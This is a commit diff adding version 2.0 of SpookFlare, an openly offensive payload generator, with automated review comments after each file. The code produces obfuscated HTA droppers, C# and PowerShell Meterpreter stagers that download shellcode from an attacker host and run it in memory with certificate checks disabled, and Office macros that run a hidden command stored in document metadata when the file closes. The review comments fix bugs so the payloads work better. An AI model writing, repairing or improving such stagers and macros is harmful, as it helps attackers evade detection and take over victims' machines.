SpookFlare v2.0. New payloads, new structure.
Showing
8 changed files
with
743 additions
and
0 deletions.
@@ -0,0 +1 @@ | ||
|
@@ -0,0 +1,104 @@ | ||
# -*- coding: utf-8 -*- | ||
import random | ||
import string | ||
import base64 | ||
|
||
def randomString(): | ||
return ''.join([random.choice(string.ascii_letters) for n in xrange(12)]) | ||
|
||
def generateKey(): | ||
keys = "!#+%&/()=?_-*[]$><" | ||
return ''.join(random.sample(keys,len(keys))) | ||
|
||
def generateBase(htaCommand, htaFileName): | ||
htaKey = generateKey() | ||
if "\"" in htaCommand: | ||
htaPayload = htaKey.join([htaCommand[i:i+1] for i in range(0, len(htaCommand), 1)]).replace("\"", "\"\"") | ||
else: | ||
htaPayload = htaKey.join([htaCommand[i:i+1] for i in range(0, len(htaCommand), 1)]) | ||
|
||
baseHta = '''<script language="VBScript"> | ||
Sub window_onload | ||
Set {0} = CreateObject("WbemScripting.SWbemLocator") | ||
Set {1} = {0}.ConnectServer() | ||
{1}.Security_.ImpersonationLevel=3 | ||
Set {2} = {1}.Get("Win32_ProcessStartup") | ||
Set {3} = {2}.SpawnInstance_ | ||
{3}.ShowWindow = 12 | ||
Set {4} = {1}.Get("Win32_Process") | ||
{6} = {4}.Create(Replace("'''+htaPayload+'''", "'''+htaKey+'''", ""), NULL, {3}, {5}) | ||
window.close() | ||
End Sub | ||
</script>''' | ||
|
||
launcherBase = '''<html><head><script type="text/javascript">var {0} = atob("'''+base64.b64encode(baseHta.format(randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString()))+'''");var {1} = "'''+htaFileName+'''.hta";var {2} = new Blob([{0}], {{type: 'plain/text;charset=utf-8;'}});var {3} = null;if (navigator.msSaveBlob) {{{3} = navigator.msSaveBlob({2}, {1});}} else {{{3} = window.URL.createObjectURL({2});}}var {4} = document.createElement('a');{4}.href = {3};{4}.setAttribute('download', {1});document.body.appendChild({4});{4}.click();document.body.removeChild({4});</script></head></body></html>''' | ||
launcherFinal = launcherBase.format(randomString(), randomString(), randomString(), randomString(), randomString()) | ||
return launcherFinal | ||
cdata = " " | ||
def obfuscateHta(launcherFinal): | ||
finalPayload = "<html><body><head><script type=\"text/javascript\">var {0}=new Array;" | ||
stcData = [] | ||
i = 0 | ||
cdata = " " | ||
while i < len(list(launcherFinal)): | ||
stringToChar = ord(list(list(launcherFinal))[i]) | ||
i+=1 | ||
if i != len(list(launcherFinal)) - 0: | ||
stcData.append(str(stringToChar)) | ||
else: | ||
stcData.append(str(stringToChar)) | ||
deep = len(stcData) | ||
if deep % 4 == 0: | ||
i = 0 | ||
x = -1 | ||
while i < deep: | ||
code = (int(stcData[i]) * 256 + int(stcData[i+1])) | ||
code =+ ((code * 256 ** 2) / 256 + int(stcData[i+2])) | ||
code =+ ((code * 256 ** 3) / 256 ** 2 + int(stcData[i+3])) | ||
i += 4 | ||
x +=1 | ||
finalPayload += "{0}["+ str(x) + "]=" + str(code) + ";" | ||
elif deep % 4 == 3: | ||
cdata = stcData [deep - 3:deep] | ||
ndata = stcData [0:deep - 3] | ||
i = 0 | ||
x = -1 | ||
while i < deep - 3: | ||
code = (int(ndata[i]) * 256 + int(ndata[i+1])) | ||
code =+ ((code * 256 ** 2) / 256 + int(ndata[i+2])) | ||
code =+ ((code * 256 ** 3) / 256 ** 2 + int(ndata[i+3])) | ||
i += 4 | ||
x +=1 | ||
finalPayload += "{0}["+ str(x) + "]=" + str(code) + ";" | ||
ccode = (int(cdata[0]) * 256 + int(cdata[1])) | ||
ccode =+ ((ccode * 256 ** 2) / 256 + int(cdata[2])) | ||
finalPayload += "{0}["+ str(x + 1) + "]=" + str(ccode) + ";" | ||
elif deep % 4 == 2: | ||
cdata = stcData [deep - 2:deep] | ||
ndata = stcData [0:deep - 2] | ||
i = 0 | ||
x = -1 | ||
while i < deep - 2: | ||
code = (int(ndata[i]) * 256 + int(ndata[i+1])) | ||
code =+ ((code * 256 ** 2) / 256 + int(ndata[i+2])) | ||
code =+ ((code * 256 ** 3) / 256 ** 2 + int(ndata[i+3])) | ||
i += 4 | ||
x +=1 | ||
finalPayload +="{0}["+ str(x) + "]=" + str(code) + ";" | ||
ccode = (int(cdata[0]) * 256 + int(cdata[1])) | ||
finalPayload +="{0}["+ str(x + 1) + "]=" + str(ccode) + ";" | ||
elif deep % 4 == 1: | ||
cdata = stcData [deep - 1:deep] | ||
ndata = stcData [0:deep - 1] | ||
i = 0 | ||
x = -1 | ||
while i < deep - 1: | ||
code = (int(ndata[i]) * 256 + int(ndata[i+1])) | ||
code =+ ((code * 256 ** 2) / 256 + int(ndata[i+2])) | ||
code =+ ((code * 256 ** 3) / 256 ** 2 + int(ndata[i+3])) | ||
i += 4 | ||
x +=1 | ||
finalPayload +="{0}["+ str(x) + "]=" + str(code) + ";" | ||
|
||
finalPayload +="var {1}=\"\";for(i=0;i<{0}.length;i++){2}={0}[i],Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3)))),{2}-=Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3))*Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3),Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2)))),{2}-=Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2))*Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2),Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1)))),{2}-=Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1))*Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1),Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,0))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,0))));document.write({1});</script></head></body></html>" | ||
return finalPayload.format(randomString(), randomString(), randomString()) |
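Review bot: In the `deep % 4 == 1` branch of `obfuscateHta` the trailing character is lost — `cdata = stcData [deep - 1:deep]` is computed but, unlike the `% 4 == 3` and `% 4 == 2` branches, never appended to `finalPayload`, so any launcher whose length is 1 mod 4 is emitted without its final byte (the closing `>` of `</html>`). Add `finalPayload += "{0}[" + str(x + 1) + "]=" + cdata[0] + ";"` after that branch's loop; the JavaScript decoder on the next line already copes with a value below 256, since only its `Math.pow(...,0)` step fires. The repeated `code =+ (...)` lines read as `code = +(...)` rather than `+=`; the arithmetic still yields `c0*256^3 + c1*256^2 + c2*256 + c3` because each step multiplies the running value by 256 before adding, but rewriting them as `code = code * 256 + int(stcData[i+2])` (or a comment saying why the odd form works) would spare the next reader the same double-take.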
@@ -0,0 +1,41 @@ | ||
# -*- coding: utf-8 -*- | ||
import random | ||
import string | ||
import base64 | ||
from base64 import b64encode | ||
|
||
def randomString(): | ||
return ''.join([random.choice(string.ascii_letters) for n in xrange(12)]) | ||
|
||
def checksum8(s): | ||
return sum([ord(ch) for ch in s]) % 0x100 | ||
|
||
def genHTTPChecksum(): | ||
chk = string.ascii_letters + string.digits | ||
for x in xrange(64): | ||
uri = "".join(random.sample(chk,3)) | ||
r = "".join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random())) | ||
for char in r: | ||
if checksum8(uri + char) == 92: | ||
return uri + char | ||
|
||
def generateMPBinLoader(mpBinProto, mpBinLhost, mpBinLport, mpBinArch, mpBinSsize): | ||
|
||
if mpBinProto == "https": | ||
mpBinSSLChk = "ServicePointManager.ServerCertificateValidationCallback = (sender, cert, chain, sslPolicyErrors) => true;" | ||
else: | ||
mpBinSSLChk = "" | ||
|
||
if mpBinArch == "x86": | ||
mpBinArch = "UInt32" | ||
elif mpBinArch == "x64": | ||
mpBinArch = "UInt64" | ||
|
||
mpBinNSpace = randomString() | ||
mpBinLClass = randomString() | ||
loaderHost = mpBinProto+"://"+mpBinLhost+":"+mpBinLport+"/"+genHTTPChecksum() | ||
loaderBase = '''using System;using System.Net;using System.Runtime.InteropServices; namespace {24} {{ public class {25} {{ [DllImport ("kernel32")] private static extern {23} VirtualAlloc ({23} {0}, {23} {1}, {23} {2}, {23} {3}); [DllImport ("kernel32")] private static extern IntPtr CreateThread ({23} {4}, {23} {5}, {23} {6}, IntPtr {7}, {23} {8}, ref {23} {9}); [DllImport ("kernel32")] private static extern {23} WaitForSingleObject (IntPtr {10}, {23} {11}); [DllImport ("kernel32.dll")] static extern IntPtr GetConsoleWindow (); [DllImport ("user32.dll")] static extern bool ShowWindow (IntPtr {12}, int {13}); public static void Main () {{ShowWindow (GetConsoleWindow (), 0);{14}WebClient {15} = new System.Net.WebClient ();{15}.Headers.Add ("User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)");{15}.Headers.Add ("Accept", "*/*");{15}.Headers.Add ("Accept-Language", "en-gb,en;q=0.5");byte[] {16} = null;{16} = {15}.DownloadData ("{26}");byte[] {17} = new byte[{16}.Length - {18}];Array.Copy ({16}, {18}, {17}, 0, {17}.Length);{23} {19} = VirtualAlloc (0, ({23}) {17}.Length, 0x1000, 0x40);Marshal.Copy ({17}, 0, (IntPtr) ({19}), {17}.Length);IntPtr {20} = IntPtr.Zero;{23} {21} = 0;IntPtr {22} = IntPtr.Zero;{20} = CreateThread (0, 0, {19}, {22}, 0, ref {21});WaitForSingleObject ({20}, 0xFFFFFFFF);}}}}}}'''.format(randomString(), randomString(), randomString(), randomString(),randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), mpBinSSLChk, randomString(), randomString(), randomString(), mpBinSsize, randomString(), randomString(), randomString(), randomString(), mpBinArch, mpBinNSpace, mpBinLClass, loaderHost) | ||
loaderKey = (''.join(random.sample("hlldzé!^+%&/()=?_<>£#$[]|",len("hlldzé!^+%&/()=?_<>£#$[]|")))[0:3]) | ||
loaderCode = loaderKey.join([loaderBase[i:i+1] for i in range(0, len(loaderBase), 1)]).replace("\"", "\\\"") | ||
loaderFinal = '''using System;using System.CodeDom.Compiler;using System.Reflection;using Microsoft.CSharp;namespace {0} {{public class {1} {{public static void Main () {{string {2} = "{3}".Replace("{4}", "");CSharpCodeProvider {5} = new CSharpCodeProvider ();CompilerParameters {6} = new CompilerParameters (new [] {{"mscorlib.dll", "System.dll"}});{6}.GenerateInMemory = true;{6}.ReferencedAssemblies.Add (Assembly.GetEntryAssembly ().Location);CompilerResults {7} = {5}.CompileAssemblyFromSource ({6}, {2});Assembly {8} = {7}.CompiledAssembly;Type {9} = {8}.GetType ("{10}.{11}");MethodInfo {12} = {9}.GetMethod ("Main");{12}.Invoke (null, null);}}}}}}'''.format(randomString(), randomString(), randomString(), loaderCode, loaderKey, randomString(), randomString(), randomString(), randomString(), randomString(), mpBinNSpace, mpBinLClass, randomString()) | ||
return loaderFinal |
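Review bot: `genHTTPChecksum` falls off the end and returns `None` when none of its 64 candidate prefixes finds a fourth character with an 8-bit checksum of 92, and `generateMPBinLoader` then dies on the `"/"+genHTTPChecksum()` concatenation with an opaque `TypeError`; add `raise RuntimeError("could not generate a checksum-92 URI")` after the loop so the rare failure is reported by name. In the same function an `mpBinArch` value other than `x86`/`x64` is not rejected and is pasted verbatim as the C# type `{23}`, producing a loader that only fails when compiled on the target, so the `if/elif` wants an `else: raise ValueError("unsupported arch: %s" % mpBinArch)`. `mpBinSsize` is likewise interpolated unchecked into `new byte[{16}.Length - {18}]` and should at least be coerced with `int()` at generation time. Note that the https branch installs `ServerCertificateValidationCallback = (...) => true`, so the stage is accepted from any certificate; that is presumably intentional for a stager, but a one-line comment would stop it being "fixed" later.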
@@ -0,0 +1,60 @@ | ||
# -*- coding: utf-8 -*- | ||
import random | ||
import string | ||
import base64 | ||
from base64 import b64encode | ||
|
||
def randomString(): | ||
return ''.join([random.choice(string.ascii_letters) for n in xrange(12)]) | ||
|
||
def checksum8(s): | ||
return sum([ord(ch) for ch in s]) % 0x100 | ||
|
||
def genHTTPChecksum(): | ||
chk = string.ascii_letters + string.digits | ||
for x in xrange(64): | ||
uri = "".join(random.sample(chk,3)) | ||
r = "".join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random())) | ||
for char in r: | ||
if checksum8(uri + char) == 92: | ||
return uri + char | ||
|
||
def generateMPPSLoader(mpProto, mpLhost, mpLport, mpArch, mpSsize): | ||
if mpArch == "x86": | ||
mpArch = "ToInt32" | ||
mpDef = "UInt32" | ||
elif mpArch == "x64": | ||
mpArch = "ToInt64" | ||
mpDef = "UInt64" | ||
|
||
loaderHost = mpProto+"://"+mpLhost+":"+mpLport+"/"+genHTTPChecksum() | ||
baseMetPs = '''${0} = @" | ||
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, {8} dwSize, {8} flAllocationType, {8} flProtect); | ||
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, {8} dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, {8} dwCreationFlags, IntPtr lpThreadId); | ||
[DllImport("kernel32.dll")] public static extern {8} WaitForSingleObject(IntPtr hHandle, {8} dwMilliseconds); | ||
"@; | ||
${1} = New-Object "`N`et.`W`ebc`l`i`ent";${1}.Headers.Add("User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)");${1}.Headers.Add("Accept", "*/*");${1}.Headers.Add("Accept-Language", "en-gb,en;q=0.5");[Byte[]] ${2} = ${1}."D`o`wn`l`oa`d`Data"("{9}");${3} = New-Object byte[] (${2}.Length - {4});[Array]::Copy(${2}, {4}, ${3}, 0, (${2}.Length - {4}));${5} = A`d`d-T`y`p`e -memberDefinition ${0} -Name "Win32" -namespace `W`in`3`2`F`un`ct`i`on`s -passthru;${6}=${5}::VirtualAlloc(0,${3}.Length,0x3000,0x40);[Runtime.InteropServices.Marshal]::Copy(${3}, 0, [IntPtr](${6}.{7}()), ${3}.Length);${5}::CreateThread(0,0,${6},0,0,0) | oUT-NuLl;`S`T`A`R`T-`S`l`e`E`p -s `8`6`4`2`0''' | ||
|
||
loaderFinal = baseMetPs.format(randomString(), randomString(), randomString(), randomString(), mpSsize, randomString(), randomString(), mpArch, mpDef, loaderHost) | ||
return loaderFinal | ||
|
||
def generateMPPSCsharpLoader(mpPsCode): | ||
mCsharpCode = '''using System; | ||
using System.IO; using System.Diagnostics; using System.Reflection; using System.Runtime.InteropServices; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text; | ||
public class {0} {{ | ||
public static void Main() {{ | ||
byte[] {1} = Convert.FromBase64String("{6}"); | ||
string {2} = Encoding.Unicode.GetString({1}); | ||
{3} {3} = RunspaceFactory.CreateRunspace(); | ||
{3}.Open(); | ||
RunspaceInvoke {4} = new RunspaceInvoke({3}); | ||
{5} {5} = {3}.CreatePipeline(); | ||
{5}.Commands.AddScript({2}); | ||
{5}.Invoke(); | ||
{3}.Close(); | ||
return; | ||
}} | ||
}}''' | ||
|
||
loaderFinal = mCsharpCode.format(randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), b64encode(mpPsCode).encode("UTF-16LE")) | ||
return loaderFinal |
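Review bot: `generateMPPSCsharpLoader` applies its encodings in the wrong order on the last line: `b64encode(mpPsCode).encode("UTF-16LE")` base64-encodes the script and then UTF-16-encodes the base64 text, interleaving NUL bytes into what is pasted into the C# string literal, whereas the generated C# does `Convert.FromBase64String` followed by `Encoding.Unicode.GetString` and therefore expects base64 of the UTF-16LE bytes. It should read `b64encode(mpPsCode.encode("UTF-16LE"))`. In `generateMPPSLoader` an `mpArch` other than `x86`/`x64` leaves `mpDef` unassigned and the `.format(...)` call fails with an `UnboundLocalError`; an `else: raise ValueError("unsupported arch: %s" % mpArch)` reports the bad input directly. `genHTTPChecksum` in this file also returns `None` when no candidate matches, which surfaces as a `TypeError` in the `loaderHost` concatenation rather than a clear error.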
@@ -0,0 +1,59 @@ | ||
# -*- coding: utf-8 -*- | ||
import random | ||
import string | ||
import base64 | ||
|
||
def randomString(): | ||
return ''.join([random.choice(string.ascii_letters) for n in xrange(12)]) | ||
|
||
def generateKey(): | ||
keys = "!#+%&/()=?_-*[]{}$><" | ||
return ''.join(random.sample(keys,len(keys))) | ||
|
||
def generateCmd(vbaKey, vbaCommand): | ||
return vbaKey.join([vbaCommand[i:i+1] for i in range(0, len(vbaCommand), 1)]) | ||
|
||
def generateVBALauncher(vbaFileType, vbaCommand, vbaMetaName): | ||
|
||
if vbaFileType == "word": | ||
vbaFileType = "ActiveDocument" | ||
elif vbaFileType == "excel": | ||
vbaFileType = "ActiveWorkbook" | ||
elif vbaFileType == "powerpoint": | ||
vbaFileType = "ActivePresentation" | ||
|
||
if vbaMetaName == "Comments": | ||
vbaMetaName = "C\"&\"o\"&\"m\"&\"m\"&\"e\"&\"n\"&\"t\"&\"s" | ||
elif vbaMetaName == "Company": | ||
vbaMetaName = "C\"&\"o\"&\"m\"&\"p\"&\"a\"&\"n\"&\"y" | ||
|
||
vbaCommandKey = generateKey() | ||
vbaBaseCmd = generateCmd(vbaCommandKey, vbaCommand) | ||
vbaBaseCode = '''Sub Auto_Close() | ||
{0} | ||
End Sub | ||
Sub AutoClose() | ||
{0} | ||
End Sub | ||
Public Function {0}() As Variant | ||
Dim {1} As DocumentProperty | ||
For Each {1} In {8}.BuiltInDocumentProperties | ||
If {1}.Name = "{10}" Then | ||
Dim {2} As String | ||
{2} = Replace({1}.Value, "{9}", "") | ||
Const HIDDEN_WINDOW = 0 | ||
Set {3} = GetObject("w"&"i"&"n"&"m"&"g"&"m"&"t"&"s"&":"&"\\"&"\\"&"."&"\\"&"r"&"o"&"o"&"t"&"\\"&"c"&"i"&"m"&"v"&"2") | ||
Set {4} = {3}.Get("W"&"i"&"n"&"3"&"2"&"_"&"P"&"r"&"o"&"c"&"e"&"s"&"s"&"S"&"t"&"a"&"r"&"t"&"u"&"p") | ||
Set {5} = {4}.SpawnInstance_ | ||
{5}.ShowWindow = HIDDEN_WINDOW | ||
Set {6} = GetObject("w"&"i"&"n"&"m"&"g"&"m"&"t"&"s"&":"&"\\"&"\\"&"."&"\\"&"r"&"o"&"o"&"t"&"\\"&"c"&"i"&"m"&"v"&"2"&":"&"W"&"i"&"n"&"3"&"2"&"_"&"P"&"r"&"o"&"c"&"e"&"s"&"s") | ||
{6}.Create {2}, Null, {5}, {7} | ||
End If | ||
Next | ||
End Function''' | ||
|
||
loaderFinal = "'\n'Insert the following string to \""+vbaMetaName.replace("\"&\"", "")+"\" meta data section of file:\n'" + vbaBaseCmd + "\n'\n\n" | ||
loaderFinal += vbaBaseCode.format(randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), vbaFileType, vbaCommandKey, vbaMetaName) | ||
return loaderFinal |
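Review bot: `generateVBALauncher` does not validate `vbaFileType` or `vbaMetaName`: when neither `if/elif` chain matches, the raw argument is pasted into the VBA as the document object in `{8}.BuiltInDocumentProperties` or as the property name in `"{10}"`, and the mistake only shows up when the macro runs. Add an `else: raise ValueError(...)` to both chains so unsupported values fail at generation time. The emitted triggers are `Auto_Close`/`AutoClose` for every file type; presumably PowerPoint fires neither, so the `powerpoint` branch would need a different entry point — confirm before relying on it. A docstring noting that the returned text begins with a comment block whose interleaved-key command must be pasted into the named document property would make the caller's contract explicit.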
@@ -0,0 +1 @@ | ||
|
@@ -0,0 +1,3 @@ | ||
cmd | ||
terminaltables | ||
textwrap |
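Review bot: `cmd` and `textwrap` in this requirements file are Python standard-library modules, not PyPI distributions, so `pip install -r` will resolve them against the package index and install whatever unrelated project, if any, is published under those names — a dependency-confusion exposure, and a misleading install failure otherwise. Only `terminaltables` is a real third-party dependency; drop the other two lines and pin it to the version the tool was tested with so the supply chain is explicit.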